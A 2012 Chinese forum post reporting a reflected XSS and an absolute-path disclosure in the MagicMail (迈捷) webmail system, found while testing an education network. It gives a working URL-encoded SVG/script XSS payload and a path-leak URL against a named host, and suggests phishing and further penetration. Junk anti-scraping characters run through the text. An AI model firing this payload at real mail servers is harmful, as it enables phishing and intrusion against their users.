今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞; E, O! w Q+ x+ E3 {' q- M; n
) d5 ?* w$ C. c9 }5 T# z
' x& d. C1 J% S7 k包含 一个反射性XSS 以及 绝对路径泄漏$ N% z! g, U( p7 P2 H
看了看 貌似全部是linux的。. e: F' _; m3 d5 e0 h3 P
' T. o r$ ?2 g8 t" K( }
关键字:迈捷邮件系统 by MagicMail9 |& s1 x! _0 t5 G \8 n
" f3 O" j4 V! @; F: |0 h) N0 d
可以看到很多政府网站都用这个邮件系统' ^, E, ]; d1 b& e3 J2 Y2 M% V/ a
6 q- }0 b8 I. v- S绝对路径 http://madman.in/index.php?login_type=declare&language=
: H( p0 |$ b/ Q: y" X( r* r4 V
, c$ Z$ i( X1 t5 M
; G$ f' e+ o: Z2 o* k6 ^& ?( G6 `9 G6 T6 P
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
! k. i3 Q2 b7 ]- }8 ]! j
{/ w; T7 h5 ~* r
& f; ^! B1 w' _! q# _
& Z8 _% _# e" _: v; ^: q虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等( |, T, T. V- @+ s8 I
; k& W2 T0 u' E9 X/ M修复方案:看官方补丁吧。
+ d) A# H* r/ S( y; n |
发表于 2012-11-9 20:38:41
收藏
支持
反对